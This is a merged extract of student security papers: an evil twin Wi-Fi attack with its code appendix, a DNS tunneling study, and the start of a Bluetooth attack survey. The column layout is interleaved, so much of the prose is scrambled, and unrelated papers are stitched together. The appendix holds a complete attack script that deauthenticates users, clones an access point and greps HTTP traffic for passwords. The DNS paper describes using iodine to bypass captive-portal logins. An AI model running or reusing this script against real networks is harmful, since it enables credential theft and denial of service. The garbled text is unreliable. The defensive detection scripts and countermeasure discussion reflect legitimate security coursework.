connect to the internet by any means, such as a broadband
communication between a client and an AP. The latter is
cellular network, another access point, or even through the
of particular interest since a weakness in its conception
legitimate AP itself.
opens the door to the so-called deauthentication attack.
This situation is depicted in the above diagram, where the We leverage this flaw in our project in order to get a
red arrows show the connections after the rogue AP has MiTM position.
acquired a MiTM position.
3.2 Deauthentication Attack
Since in this communication we either know the WPA2
key, or there is no encryption at all, the rogue AP can The deauthentication frame is sent by a station to another
reliably read, block, modify or inject packets, which opens when it wants to terminate the communication between
the door to a whole range of attacks. As an example in our the two, and can be sent at any point in time while the two
demonstration we use the MiTM position to redirect all stations are connected. The major flaw resides in the fact
the web traffic from the client to a crafted HTTP server. that this deauthentication frame is not itself
cryptographically authenticated in any way even when the
2.2 MiTM on WPA2 secured AP connection is WPA2 secured. This deauthentication frame
can even be broadcasted in order to terminate all the
ongoing connection with a particular AP. As such an
attacker can impersonate an AP and broadcast
deauthentication frames to all the users connected to it and
thus terminate all the ongoing connections within the
targeted network. Figure 3 illustrates this process:
gp09
PDFsam_merge 66
70
Depending on its configuration, the client’s firmware may be arbitrary, but must be identical to that of the legitimate
try to resume the connection promptly after receiving the AP. In fact, this is necessary because the session key used
deauthentication frame from the AP. Sending many by the client and legitimate AP to communicate depends
spoofed deauthentication packets in short time intervals on the key, the client’s and the AP’s MAC addresses [5].
prevents the client to access the server at all. This denial The deauthentication attack works just as well as for the
of service attack (DoS) is very effective against any access open Wi-Fi case since the deauthentication frame is not
point or client that is IEEE 802.11 compliant. authenticated as discussed in section 3.2.
gp09
PDFsam_merge 67
71
4.2 Methodology no difference between them, they all got disconnected as
The program evil_twin.sh that we have written is a Bash intended when broadcasting deauthentication frames.
script that performs the evil twin attack on open Wi-Fi. However, some devices do not accept broadcasted
The code is provided in Appendix I. Below is the deauthentication frames. This problem was remedied by
explanation of the main ideas of this implementation. sending a targeted deauthentication frame to that device.
The reconnection also automatically started on all of these
First of all, we ask the user which interface he wants to devices. Most of the times, it reconnected to the evil twin.
use for the connection to the Internet, for the access point, However, sometimes, especially when the legit AP was
and for the deauthentication. This is a necessary step for closer than the rogue AP, the device was reconnecting to
portability, because the Wi-Fi card’s interface name can the legitimate one which is not our goal.
change from a computer to another, and is very likely to
change from a Wi-Fi dongle to another. The results for the WPA/WPA2-PSK network is the same
as the open Wi-Fi network. The important thing to note
Then the script shows a list of the existing nearby APs, regarding the protected networks is that even when they
and asks the user to select one to perform the attack on. are deauthenticated from the target network and
The next step is to scan the network, and keep only automatically connect to the Evil Twin AP, the users are
information (ESSID, BSSID, channel) about the not prompted to re-enter the password. This will prevent
previously selected AP. even knowledgeable individuals from getting suspicious.
After this, we can create the rogue AP. We do this using 5. PROPOSED COUNTERMEASURES
create_ap and specifying the access point interface, the There are various ways to prevent the evil twin attack from
Internet access interface, and the ESSID of the Wi-Fi, that happening whether on the client side or on the access point
will of course be the target Wi-Fi’s name. side. In this section we will discuss some of them and
evaluate their efficacy.
Now that we have created the evil twin, we need the users
to connect to it. That is, we need to disconnect them from
the legitimate AP and hope our rogue AP has a stronger
signal so that they automatically reconnect to ours.
Placing our computer physically closer to the users than
the legitimate AP can contribute to the success of the
operation. Figure 4. Notification of ongoing attack
For this part we first need to set the deauthentication
interface in monitor mode. Then in a loop, a
5.1 Detection of Deauthentication
deauthentication attack is launched against every AP with Similar to spoofing a deauthentication frame, it is also
the target ESSID (in case the target Wi-Fi is actually easy for us to sniff what kind frames are sent over the air,
provided that they are not encrypted from our perspective:
composed of various different APs), broadcasting
thus, we are able to monitor the rate at which
deauthentication frames with aireplay-ng. At this point all
deauthentication frames are sent to or from the AP’s MAC
of the users of the target AP should be disconnected, and
are likely to automatically reconnect to the evil twin. address. If this rate is unusually high, there is a high
chance that a deauthentication attack is taking place.
The implementation of an Evil Twin access point for Furthermore, The deauthentication frames are almost
WPA/WPA2 networks with a known Pre-Shared-Key is always broadcasted and the Reason Code for
similar to that of open Wi-Fi. WPA/WPA2-PSK networks deauthentication is always the same; “Class 3 frame
are predominant in most restaurants and coffee shops received from nonassociated STA (0x0007). When we
where the Pre-Shared-Key is displayed in public. Most combine these three conditions, it is possible to detect
members of the public believe that as long as there’s a deauthentication attacks with a high probability.
password for the Wi-Fi network, that it is secured,
however, the following steps will show how easy it is to 5.2 Detection of Evil Twin
set up a Man-In-The-Middle attack for these networks. As we have discussed in previous sections the evil twin is
a rogue access point that possesses the same ESSID as a
First, a rogue AP will be created just as the previous legitimate one and may or may not have the same BSSID
section states, except that this time, we will change the as well.
network type to WPA/WPA2-PSK and assign the same
Pre-Shared-Key as that of the target network. Following In the case of a cloned BSSID, a way to detect the attack
which, deauthentication frames will be broadcasted to the is to scan the neighbouring access points regularly and
target network to bump off all existing users from that notify the user when two AP’s have the same ESSID and
network. Finally, the victims will automatically connect to BSSID but on different channels. This usually does not
the Evil Twin Access Point and the Man-In-The-Middle happen unless an attack is ongoing.
position is gained by the attacker.
If the rogue AP has an arbitrary BSSID different from the
4.3 Results legitimate one, the details of the AP’s alone do not give
We tested this script using different devices as the user, enough information to detect an ongoing attack. As such
running on either iOS, Android or Windows 7. There was a user could create a whitelist containing all the ESSIDs
gp09
PDFsam_merge 68
72
he trusts and their corresponding BSSIDs. For example The algorithm of detect_deauth.py is very simple and is
the home setup of a user could be composed of multiple as follows:
APs in order to have a good cover inside his whole house.
When setting up those APs, the user whitelists their 1. Set the Wi-Fi dongle to monitor mode. This
corresponding BSSIDs. Then a program scans the access allows us to use the interface to sniff packets
points regularly a informs the user when an available AP being sent in the air.
is not whitelisted (figure 5). 2. Specify which MAC address to monitor.
3. For every deauthentication frame sniffed by the
Combining these two approaches at the same time allow interface, check its source and destination MAC
for an easy to implement client-side detection of the evil address. If either of the two fields contains the
twin attack. The main drawback being the difficulty of target MAC address, we increment the deauth
maintaining a correct and up-to-date whitelist of the counter.
trusted AP’s. 4. If the rate of deauthentication frames per minute
is above the threshold specified by the user, we
5.3 Integrity check of management print out a warning.
frames The way we distinguish deauthentication frames from
As have been implemented, we are able to easily spoof other types of frames is by the frame type and subtype:
either the AP or the client's MAC address and send management frames are of type 0, and further,
deauthentication frame on their behalf, even if the network deauthentication frames are of subtype 12. See Appendix
is encrypted with a key unknown to the attacker. The flaw V for the list of types and subtypes of IEEE 802.11 frames.
lies in the fact that management frames are unencrypted. Note that it is somewhat difficult to determine exactly the
What can be done to prevent deauthentication attack is rate beyond which we recognize deauthentication attack is
simple: make the Wi-Fi network encrypted if not already in place and below which we assume order. This is
so, and protect the management frames in addition to the because deauthentication frames are a part of the
data frames so that we can enforce their confidentiality as legitimate network protocol which are sent back and forth
well as authenticity. This way, it is difficult, if not between two authentic machines. Here, our goal is to
impossible, for an attacker to impersonate the clients or demonstrate the feasibility of detecting deauthentication
the AP since the attacker will have to know the shared key frames, and thus such a complication is simplified by
established between them to pass the integrity check. allowing the user to specify the rate.
In 2009, a new protocol that augments this feature to the 6.2 Detection of Evil Twin attack
existing Wi-Fi protocol was officially released, named In the bash script evil_twin_detect.sh provided in
802.11w [7]. This protects not only the data frames but appendix III, we implemented the defence mechanisms
also the management frames such as deauthentication, and described in section 5.2. This script can be run on the
thus is immune to such attacks from outside. computer of a client while he is connected to the internet
and a soon as an evil twin attack is detected, the client is
5.4 Security at Higher Layers informed by a notification. This program lists all the APs
If the Wi-Fi protocol, which operates at both the physical with the same ESSIDs as that of the AP the client is
and data link layer, fails to provide the security connected to. It checks that no two of those share the same
requirements it is possible to rely on higher layers. As an BSSID and that all are in the client’s whitelist. If one of
example it is now common practice to use the HTTPS these conditions is not met a notification is sent to inform
protocol (application layer) in order to secure connection the client of a possible ongoing attack. The whitelist is a
to websites. Although HTTPS is not itself free from any text file named authorised.list (a sample is provided in
vulnerability, such as SSL strip for example. Furthermore, appendix IV) which must follow the following format : the
even if appropriate security measures at higher layers may first line consists of an integer X denoting the number of
prevent a MiTM from reading, tampering or replaying the different whitelisted ESSIDs. This line is followed by X
packets the attacker could still block some or all of them. blocks. Each one begins with the ESSID on the first line,
then an integer Y denoting the number of accepted
6. IMPLEMENTATION OF BSSIDs, followed by the Y BSSIDs each on a new line.
SELECTED COUNTERMEASURES
In the following sections we will describe our own
7. CONCLUSION
In this paper, we have implemented a Man-In-The-Middle
implementations of two of the countermeasures described
attack on both Open Wi-Fi and WPA/WPA2-PSK
in section 5.
protected Wi-Fi. This was done by setting up an Evil Twin
AP and broadcasting deauthentication frames in the target
6.1 Detection of Deauthentication
network to kick current users off from the network.
We have used the following tools to implement a proof-
Following which, the users’ devices will automatically
of-concept deauthentication detection program,
reconnect to the Evil Twin AP which will grant us the
detect_deauth.py.
Man-In-The-Middle position. Finally, we have also
- Python 2.7 with scapy library, on Ubuntu Linux proposed and implemented two countermeasures. The
- Wi-Fi dongle (for monitor interface) first method detects suspicious deauthentication frames
and the second method detects Evil Twin Access Points.
gp09
PDFsam_merge 69
73
In conclusion, we have proven how unsecure Open Wi-Fi
networks and WPA/WPA2-PSK networks are and that it
is easy for a malicious user to perform all manners of
MiTM attacks on these networks once he is in position.
8. ACKNOWLEDGEMENTS
We would like to thank Professor Hugh Anderson for his
guidance and advice during the entirety of this project. We
would also like to thank him for loaning us the necessary
equipment that were vital in completing this project.
9. REFERENCES
[1] Aircrack-ng. 2017. Aircrack-ng’s website.
Retrieved November 6, 2017 from
https://www.aircrack-ng.org/
gp09
PDFsam_merge 70
74
10. APPENDIX
The code is also available at :
https://github.com/CS3235-project/wifi-spoofing
I. EVIL_TWIN.SH
1. #!/bin/bash
2. echo "Enter interface for monitoring/injection"
3. read interface_deauth
4. echo "Enter interface for rogue AP"
5. read interface_ap
6. echo "Enter faceing interface"
7. read interface_faceing
8. echo "Enter Wi-Fi type 1: Open, 2: WPA/WPA2 PSK"
9. read wifitype
10.
11. if [ $wifitype = 2 ]
12. then
13. echo "Please enter the passphrase"
14. read -s passphrase
15.
16. fi
17. echo "Setting up interfaces, this might take while"
18.
19. ifconfig ${interface_deauth} down
20. iwconfig ${interface_deauth} mode managed
21. ifconfig ${interface_deauth} up
22. sleep 5s
23. ifconfig ${interface_ap} down
24. iwconfig ${interface_ap} mode managed
25. ifconfig ${interface_ap} up
26. sleep 5s
27.
28.
29. #shows a list of the neighbooring AP's
30. iwlist ${interface_deauth} scan | grep "ESSID"
31.
32. echo "Enter the ESSID of the target AP"
33. read essid
34.
35. #stores in an array information about AP's with the given ESSID (MAC Address, channel, ESSI
D)
36. array=( $(sudo iwlist ${interface_deauth} scan | grep "Address\|Channel:\|ESSID:" | grep -
B 2 "${essid}") )
37.
38. #variable used keep track of the index of the array
39. count=0
40.
41. echo "Do you really want to attack ${essid} Yes/No ?"
42. read response
43.
44. if [ $response = Yes ]
45. then
46. echo "Attack launched"
47. if [ $wifitype = 1 ]
48. then
49. #a rogue AP with the target ESSID is created
50. xterm -hold -e create_ap ${interface_ap} ${interface_faceing} "${essid}" &
51. sleep 5s
52. echo " Wireless Network ${essid} created"
53.
54. fi
55.
56. if [ $wifitype = 2 ]
57. then
gp09
PDFsam_merge 71
75
58. xterm -hold -
e create_ap ${interface_ap} ${interface_faceing} "${essid}" ${passphrase} &
59. sleep 5s
60. echo "Wireless Network ${essid} created"
61.
62. fi
63.
64.
65. #puts the deauthing interface into monitor mode, necessary for injecting dauthenticatio
n frames
66. ifconfig ${interface_deauth} down
67. iwconfig ${interface_deauth} mode monitor
68. ifconfig ${interface_deauth} up
69.
70. #a deauthentication attack is launched against every AP with the target ESSID
71. for i in "${array[@]}"
72. do
73. #these magic constants (%8, -
eq 4) are designed to extract the required information from the grep output
74. if [ $(($count%8)) -eq 4 ]
75. then
76. #stores the target AP's MAC address
77. address=$i
78. fi
79. if [ $(($count%8)) -eq 5 ]
80. then
81. #stores the target AP0s channel
82. channel="${i//[!0-9]/}"
83.
84. #switches the channel of the deauthing interface to the target AP's channel
85. iwconfig ${interface_deauth} channel ${channel}
86.
87. #deauthenticate users connected to the target AP
88. (xterm -hold -e aireplay-ng -0 15 -a ${address} ${interface_deauth} &)
89. fi
90. ((++count))
91. done
92. fi
93.
94. xterm -hold -e "tcpdump -i ${interface_ap} port http -l -A | egrep -
i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username
:|password:|login:|pass |user ' --color=auto --line-buffered -B20" &
II. DEAUTH_DETECT.PY
1. #!/usr/bin/env python
2.
3. """ execute with root permission
4. let wlan1 be the interface used for monitoring. Then either
5. 1. Use airmon-ng wlan1 start
6. to set up interface named mon0
7. 2. Do manually:
8. ifconfig wlan1 down
9. iwconfig wlan1 mode monitor
10. iwconfig wlan1 channel (set to whichever channel the AP is in)
11. ifconfig wlan1 up
12.
13. Make sure that the channel in which your AP is active and the channel your monitoring inter
face
14. is in are the same.
15. """
16.
17. import sys
18. import socket
19. import time
20. import string
gp09
PDFsam_merge 72
76
21. from scapy.all import *
22.
23. # global variables such that they are accessible from the event handler
24. target_mac = None # must be lowercase
25. target_essid = None
26. deauth_count = 0
27. last_time_deauth_received = 0
28. threshold = 0
29.
30. def sniff_req(packet):
31. """ event handler for scapy's sniff method
32. the argument is the packet received
33. """
34. ## DEBUG-MODE
35. # if packet.haslayer(Dot11):
36. # print packet.sprintf("packet from AP [%Dot11.addr2%] to Client [%Dot11.addr1%]")
37.
38. # look for a deauth packet
39. if packet.haslayer(Dot11Deauth):
40. global deauth_count, last_time_deauth_received
41. if True: # just to avoid changing indentation
42. current_time = time.time()
43. if current_time - last_time_deauth_received > 60:
44. last_time_deauth_received = current_time
45. deauth_count = 0
46. deauth_count += 1
47. print packet.sprintf("Deauth from AP [%Dot11.addr2%] to Client [%Dot11.addr1%],
\
48. Reason [%Dot11Deauth.reason%]")
49. print 'count/min = %d' % (deauth_count)
50.
51. def info(fm):
52. if fm.haslayer(Dot11):
53. if ((fm.type == 0) & (fm.subtype==8)):
54. captured_essid = str(fm.info).strip()
55. captured_essid = string.lower(captured_essid)
56. # print captured_essid #uncomment this line to check if scanning properly
57. global target_essid
58. if captured_essid == target_essid:
59. global target_mac
60. target_mac = fm.addr2
61.
62. def is_mac_found(p):
63. """ function that is supposed to be passed to sniff() to terminate sniffing
64. """
65. global target_mac
66. return target_mac != None
67.
68. def find_mac_from_essid(interface):
69. """ converts ESSID to MAC address. Timeout is set to 4
70. """
71. sniff(iface=interface,prn=info, timeout=4)
72.
73. def main():
74. """ main function
75. """
76. if len(sys.argv) < 4:
77. print 'Wrong command arguments'
78. print '1. specify your interface used for monitoring'
79. print '2. specify the network to monitor'
80. print '3. specify the deauth frame count limit per min'
81. print 'for example:\n ' + sys.argv[0] + ' mon0 myWifi 40'
82. sys.exit()
83.
84. global target_mac, threshold, last_time_deauth_received, target_essid
gp09
PDFsam_merge 73
77
85.
86. interface = sys.argv[1]
87. target_essid = sys.argv[2]
88. threshold = sys.argv[3]
89.
90. print 'scanning for the MAC address of %s' % (target_essid)
91. find_mac_from_essid(interface=interface)
92. if target_mac is None:
93. print 'corresponding mac address was not found.'
94. print 'is the network up?'
95. sys.exit()
96.
97. target_mac = string.lower(target_mac)
98.
99. last_time_deauth_received = time.time()
100. # Berkeley Packet Filter format
101. filter_statement = "ether src " + target_mac
102.
103. print 'now monitoring ESSID(%s) with BSSID(%s) on interface %s' % (target_essid
, target_mac, interface)
104. sniff(filter=filter_statement, iface=interface, prn=sniff_req)
105. # sniff(iface=interface, prn=sniff_req) # uncomment this line to test that the
filter is working
106.
107. if __name__ == '__main__':
108. main()
III. EVIL_TWIN_DETECT.SH
1. #!/bin/bash
2.
3. #basic version of a defence program against hotspot spoofing
4. #given some preferred essid and MAC, if another MAC with the same SSID exists
5. #a notification warns the user
6.
7. echo "Enter scanning interface"
8. read interface
9. mapfile -t myArray < authorised.list
10. while true
11. do
12. index=1
13. for j in $(seq 0 $((myArray[0]-1)))
14. do
15. count=0
16. SSID=${myArray[index]}
17. ((++index))
18. connectedSSID=$(iwgetid -r)
19. array=( $(iwlist ${interface} scan | grep Address ) )
20. connectedMAC=${array[4]}
21. nbAuthorisedMacs=${myArray[index]}
22. ((++index))
23. if [ "$SSID" == "$connectedSSID" ]
24. then
25. array=( $(sudo iwlist ${interface} scan | grep 'Address\|ESSID:' | grep -
B 1 "\"${SSID}\"") )
26. sameMac=0
27. for i in "${array[@]}"
28. do
29. if [ $((count%7)) -eq 4 ]
30. then
31. #echo "${i}"
32. #echo "${connectedMAC}"
33. if [ "${connectedMAC}" == "$i" ]
34. then
35. ((++sameMac))
gp09
PDFsam_merge 74
78
36. fi
37. problem="YES"
38. for k in $(seq $index $((index+nbAuthorisedMacs-1)))
39. do
40. if [ "${myArray[k]}" == "$i" ]
41. then
42. problem="NO"
43. fi
44. done
45. if [ "$problem" != "NO" ] && [ "${i}" != "ESSID:\"$SSID\"" ]
46. then
47. notify-send "Warning, wifi ${SSID} may be compromised"
48. echo "Warning, unexpeced MAC : ${i}"
49. fi
50. fi
51. ((++count))
52. done
53. if [ "$sameMac" != "1" ]
54. then
55. notify-send "Warning, wifi ${SSID} may be compromised"
56. echo "Warning, there are ${sameMac} AP with identical MAC"
57. fi
58. fi
59. index=$((index+nbAuthorisedMacs))
60. done
61. done
IV. WHITE.LIST
1. 2
2. NUS
3. 2
4. 88:F0:31:8D:21:CF
5. A8:9D:21:F3:70:8F
6. NUSOPEN
7. 1
8. 58:2A:F7:9E:45:A4
9.
gp09
PDFsam_merge 75
79
V. TYPES AND SUBTYPES OF IEEE
802.11 MANAGEMENT FRAMES
gp09
PDFsam_merge 76
80
Exploiting DNS Protocol as a Covert Channel
Amarparkash Singh Mavi Chua Lin Jing Chu Ying Yu
School of Computing School of Computing School of Computing
National University of Singapore National University of Singapore National University of Singapore
13 Computing Drive 13 Computing Drive 13 Computing Drive
Singapore 117417 Singapore 117417 Singapore 117417
a0123935@u.nus.edu a0131188@u.nus.edu e0002358
Hou Ruomu Joelle Lim Yan Yi
School of Computing School of Computing
National University of Singapore National University of Singapore
13 Computing Drive 13 Computing Drive
Singapore 117417 Singapore 117417
a0131421@u.nus.edu a0127032@u.nus.edu
gp10
PDFsam_merge 77
81
recognises. The motivation for DNS was really to bridge the gap Table 1. Table of Common Resource Record Types
between the language that the computer understands and the Resource Record Type Associated Information
language that we humans understand. Computers identify entities
A IPv4 address
on the network using IP addresses. However, it is counter-
CNAME Alias of domain name
intuitive for us humans to identify websites or hosts in general,
NS Domain name of authoritative
using their IP addresses. That explains the need for a mapping in
name server
the form of DNS. It is one of the hugely significant protocols that
we unknowingly utilise countless times on a daily basis. It takes MX Domain name of mail server
effect whenever we enter a website URL into the browser. This TXT Any text
action prompts a DNS query to resolve the website’s IP address.
This IP address essentially identifies the web server that is There are generally two ways in which a client can use DNS to
subsequently queried with a HTTP request to serve the webpage. resolve a domain name to an IP address. The first method involves
By default, DNS utilises port 53 for its service. a non-recursive query. In this case, the client contacts the DNS
servers individually until it locates the authoritative name server
that contains the queried domain name. The other method
involves a recursive query where the client simply transmits a
query that requests for the IP address of the queried domain name
and in return, it expects a response that contains the resolved IP
address of the domain name [4]. Recursive queries are essentially
the most common form of DNS queries. In this case, the query is
directed to a recursive name server that resolves the FQDN on
behalf of the client through an iterative process [9].
gp10
PDFsam_merge 78
82
2.3 DNS Tunneling probing mechanism for discovering the best available resource
DNS Tunneling is an attack type that exploits the DNS protocol record type for transmission. Iodine would first attempt to use
as a covert channel by encoding data within DNS messages. It resource records with higher bandwidth, such as NULL and
essentially exploits the fact that communication on port 53 with PRIVATE before testing lower bandwidth options such as A and
the local DNS server is not filtered on most networks. The reason CNAME [5]. This serves to ensure that users are able to achieve
for this common negligence is because DNS is essentially not the best possible throughput between the server and the client.
perceived as a protocol that facilitates data transfer [6] but rather
as a primary supporting protocol that is needed before any
3.2 Experimental Trials
As mentioned in section 2.3, one of the main reasons why DNS
communication can be initiated using other protocols such as
Tunneling can be successfully performed is due to the fact that
HTTP. As such, it is a protocol that is generally overlooked from
communication with the local DNS server on port 53 is often
a security viewpoint and allowed by firewalls [9]. The situation is
unmonitored in wireless networks. This essentially includes
further compounded by the fact that networks usually implement
enterprise networks where the objectives of DNS Tunneling can
recursive queries where the local DNS server acts as a recursive
be relatively more malicious. As such, we realized that the issue
DNS server. As such, this leaves significant room for the protocol
of greater significance is the prevalence of this security flaw
to be exploited as a covert channel. In the case of an enterprise, an
where communication with the local DNS server is often not
attacker with access to an internal machine on the local network
filtered.
can essentially tunnel confidential data over DNS to a domain that
he controls. This could facilitate data exfiltration or in general,
In order to examine how prevalent this security flaw is, we
tunneling of any internet protocol (IP) traffic [6] which even
decided to conduct some experimental trials for key public
allows casual users to leverage this for internet surfing in open
wireless networks in Singapore. This comprised one of
Wi-Fi networks, something that we would further elaborate upon
Singapore’s largest public Wi-Fi services, Wireless@SG, NUS’s
as part of our experimental trials in section 3.2.
public Wi-Fi, NUSOPEN and the Wi-Fi at a fast food restaurant,
Pizza Hut. These networks are essentially open Wi-Fi networks
The fields typically exploited in DNS Tunneling are resource
where credentials are required before access can be granted for
records as highlighted in the previous section. These fields are
surfing the internet as shown respectively in figures 3, 4 and 5.
essentially utilised as covert carriers for tunneling data over DNS.
However, as we would demonstrate in a later section, an
alternative to resource records would be TTL fields that can also
be employed as covert carriers. The motivation for this has to do
largely with current defenses such as semantic analysis which
particularly target the exploitation of resource records.
Iodine uses nearly all the fields (except for the TTL field) in DNS
queries and responses to transmit information, which makes it an
extremely flexible DNS Tunneling tool. It also uses a variety of
codecs to fit different situations in the transmission. More Figure 4. NUSOPEN Login Page
information can be found in the Iodine documentation, under
operational information [5].
gp10
PDFsam_merge 79
83
be a webpage displayed requesting for credentials before granting
access to the internet as shown respectively in figures 3, 4 and 5.
We then ran the iodine client and SSH tunnel. Following this, if
we did a curl to a website URL, we would be able to surf the
internet without having to provide any credentials to the displayed
webpage. Figure 7 shows that we were successfully able to curl to
the website hugh.comp.nus.edu.sg and fetch information. This
implied that we had successfully bypassed the authentication and
gained access to the internet.
gp10
PDFsam_merge 80
84
Figure 8 illustrates some example outcomes as a result of incorporating the use of DNS blacklists/whitelists as a defensive
incorporating semantic analysis as a defensive technique against technique against DNS Tunneling.
DNS Tunneling.
For the server side, we obtained a domain name and also set up an
authoritative name server for the domain. As seen in figure 11,
Figure 9. Example Outcomes from Traffic Analysis any DNS query for tunnel.pixelect.me would be directed to its
authoritative name server ns.pixelect.me. The glue record for
ns.pixelect.me ensures that the DNS query is forwarded to a
DNS Blacklists/Whitelists. In the case of DNS blacklists or
machine which is running a modified DNS server under our
whitelists, it involves a more aggressive defensive approach where
control.
the decision to grant access to a particular domain is decided with
the aid of a database [8]. In the case of a DNS blacklist, it would
contain domain names for which access would be blocked while
for a DNS whitelist, it would contain trusted domain names for
which access would be permitted. The network administrator
could choose to incorporate either of the two lists or even both.
Figure 10 illustrates some example outcomes as a result of
gp10
PDFsam_merge 81
85
Table 2. Summary of Comparative Analysis
gp10
PDFsam_merge 82
86
of 3 bytes per resource record which is a restriction due to the 7. CONCLUSION
specification of the protocol. In this paper, we provided an analysis of how the DNS protocol
can be exploited as a covert channel to facilitate a specific attack,
Covertness. In the case of covertness, the expected covertness for DNS Tunneling. We began with a case study analysis of one of
resource records would generally be lower as compared to the the state-of-the-art tools, Iodine which we subsequently utilized to
TTL field. That is because when one encodes information in empirically examine the prevalence of the phenomenon through a
resource record types such as TXT or NULL, it is usually obvious set of experimental trials. We then explored an alternative covert
to a semantic analysis tool that the fields contain some redundant carrier for DNS Tunneling, the TTL field and detailed the
information. In contrast, the TTL field is not viewed as a carrier of implementation of our proof of concept. We concluded with a
protocol data since it is just a time specification and therefore, it is comparative analysis between the traditional use of resource
usually overlooked by most analyzers. records and the use of the TTL field as the choice of covert carrier
in DNS Tunneling. In general, we believe that there are
Defenses. In the case of defenses against DNS Tunneling, there potentially effective defenses that exist against DNS Tunneling
are 3 main streams as identified in section 4: semantic analysis, but the key factor of significance is implementation decisions in
traffic analysis and DNS blacklists/whitelists. In general, these networks. Certain implementation choices can give rise to
defenses can work against the exploitation of resource records but significant security flaws that only serve to enhance the viability
in the case of TTL field, semantic analysis could be defeated. That of an attack.
is because, semantic analysis generally targets resource records in
DNS responses and as mentioned earlier in the discussion for
covertness, the TTL field is often overlooked by most semantic 8. ACKNOWLEDGMENTS
analysis tools. On the other hand, traffic analysis and DNS We would like to express our gratitude to Prof. Hugh Anderson
blacklists/whitelists are more comprehensive defenses since they for his valuable assistance during the course of this project.
do not specifically target the contents within a DNS message. As
such, they can also work against the exploitation of the TTL field. 9. REFERENCES
[1] Couture, E. Covert Channels, 2010. Retrieved 20
In general, amongst the two defenses, traffic analysis and DNS September, 2017, from SANS Institute InfoSec
blacklists/whitelists, DNS blacklists/whitelists would be the most Reading Room: https://www.sans.org/reading
effective and sustainable defense given that the list is sufficiently room/whitepapers/detection/covert-channels-33413
comprehensive. That is because, in the case of traffic analysis, the
defense is more likely to be effective if the tunneled information is [2] DNS Architecture. Retrieved 25 October, 2017, from
significantly large (>1mB). Therefore, it might prove to be Microsoft: https://technet.microsoft.com/en-
ineffective against the leakage of small data (e.g. us/library/dd197427(v=ws.10).aspx
keys/credentials). [3] DNS Protocol. Retrieved 26 October, 2017, from Microsoft:
https://technet.microsoft.com/en-
It is also worth noting that the key factor that facilitates DNS us/library/dd197470(v=ws.10).aspx
Tunneling is actually implementation decisions for a network. The
decision of leaving port 53 unmonitored is a significant security [4] DNS QUERIES & RESOLUTION PROCESS. Retrieved 25
flaw that leaves the network defenseless against DNS Tunneling. October, 2017, from Firewall.cx:
On the hand, although effective defenses such as DNS http://www.firewall.cx/networking-topics/protocols/domain-
blacklists/whitelists exist, their effectiveness is still constrained name-system-dns/159-protocols-dns-resolution.html
once again due to implementation decisions. For instance, in the
[5] Ekman, E., Andersson, B. and Bezemer, A. Iodine. Retrieved
case of open Wi-Fi networks, this has to do largely with the
15 September, 2017, from GitHub:
complication in deploying a login system. The login system often
https://github.com/yarrick/iodine
lies on the gateway server which redirects all the outbound traffic
from not-yet-authorized clients to the login page. It is impossible [6] Farnham, G. and Atlasis, A. Detecting DNS Tunneling,
to block the traffic to the local DNS server as doing so would 2013. Retrieved 24 October, 2017, from SANS Institute
prevent the login page from being accessed by the client. The InfoSec Reading Room: https://www.sans.org/reading-
local DNS server also cannot be blocked from accessing the room/whitepapers/dns/detecting-dns-tunneling-34152
internet as doing so would cause the authorized clients to be
blocked from browsing. As such, the optimal implementation is to [7] Fokau, A. Simple DNS server (UDP and TCP) in Python
allow the DNS server and the gateway server to share an identical using dnslib.py. Retrieved 28 October, 2017, from GitHub:
authorization list and serve differently for the queries from https://gist.github.com/andreif/6069838
authorized and unauthorized clients. However, such an [8] Levine, J. DNS blacklists and whitelists (No. RFC 5782),
implementation is almost never seen because open Wi-Fi 2010.
providers usually consider DNS and gateway as two different
systems where there is no integration facilitated by the respective [9] Marchal, S. DNS and Semantic Analysis for
vendors of the systems. Once again, such an implementation Phishing Detection, 2015.
choice facilitates DNS Tunneling despite the existence of [10] Roolvink, S. Detecting attacks involving DNS
potentially effective defenses. Servers: A Netflow data based approach, 2008.
gp10
PDFsam_merge 83
87
PDFsam_merge 88
CS3235 Group 11: Hacking Bluetooth
gp11
PDFsam_merge 85
89
analysis was conducted on 427 bluejacks from Bluejackq,
an online community of bluejackers, in which the contex-
tual characteristics of bluejacking were examined. Bluejack-
ing was found to be highly location-dependent, primarily
transpiring in everyday public places. The message content
of the bluejacks was also inspired by the physical location
where bluejacking took place. with full access to call and
SMS functionality, internet connection, and many phone set-
tings.” [6]
2.2.2 Bluesmack
“BlueSmack is a Bluetooth attack that knocks out some
Figure 1: Simplified Bluetooth Stack
Bluetooth-enabled devices immediately. This Denial of Ser-
vice (DoS) attack can be conducted using standard tools
In this paper, there are two layers of the Bluetooth stack that ship with the official Linux Bluez utils package. The
which are our focus, namely the Logical Link Control and ’Ping of Death’ is basically a network ping packet that used
Adaptation Layer Protocol (L2CAP) on the first layer, the to knock out early versions of Microsoft Windows 95. The
Bluetooth Network Encapsulation Protocol (BNEP), Radio BlueSmack is the same kind of attack buit transferred in to
Frequency Communication (RFCOMM) and Service Discov- the Bluetooth world. On the L2CAP layer there is the pos-
ery Protocol (SDP) on the second layer. (Refer to Figure sibility to request an echo from another Bluetooth peer. As
1) for the ICMP ping, the idea of the L2CAP ping (echo re-
quest) is also to check connectivity and to measure roundtrip
L2CAP provides connection oriented and connectionless data time on the established link. Basically, the l2ping that ships
services to upper layer protocols with protocol multiplexing with the standard distribution of the BlueZ utils allows the
capability, segmentation and reassembly operation and is user to specify a packet length that is sent to the respective
the lowest layer in the Bluetooth stack. [1, 2] peer. This is done by meas of the -s <num> option. Many
(many) iPaqs (a Pocket PC and personal digital assistant
RFCOMM, which is encapculated by L2CAP, is serial ca- first unveiled by Compaq in April 2000) react immidiately
ble emulation protocol based on ETSI TS 07.10, giving AT beginning with a size of about 600 bytes.” [7]
commands. [1, 3]
2.2.3 Bluesnarfing
BNEP facilitates network encapsulation (usually IP based) “Bluesnarfing is the unauthorized access of information from
over Bluetooth. [1, 2] a wireless device through a Bluetooth connection, often be-
tween phones, desktops, laptops, and PDAs (personal digi-
SDP allow devices to discover what services are supported tal assistant). This allows access to calendars, contact lists,
by each other, and what parameters to use to connect to emails and text messages, and on some phones, users can
them. [1] Some examples include the Audio/Video Control copy pictures and private videos.” [8]
Transport Protocol (AVCTP) or Audio/Video Distribution
Transport Protocol (AVDTP), which provide the Advanced 2.2.4 Bluebugging
Audio Distribution Profile (A2DP) service. “Bluebugging is a form of Bluetooth attack often caused by
a lack of awareness. It was developed after the onset of blue-
However, an unnecessary complexity of Bluetooth is frag- jacking and bluesnarfing. Similar to bluesnarfing, bluebug-
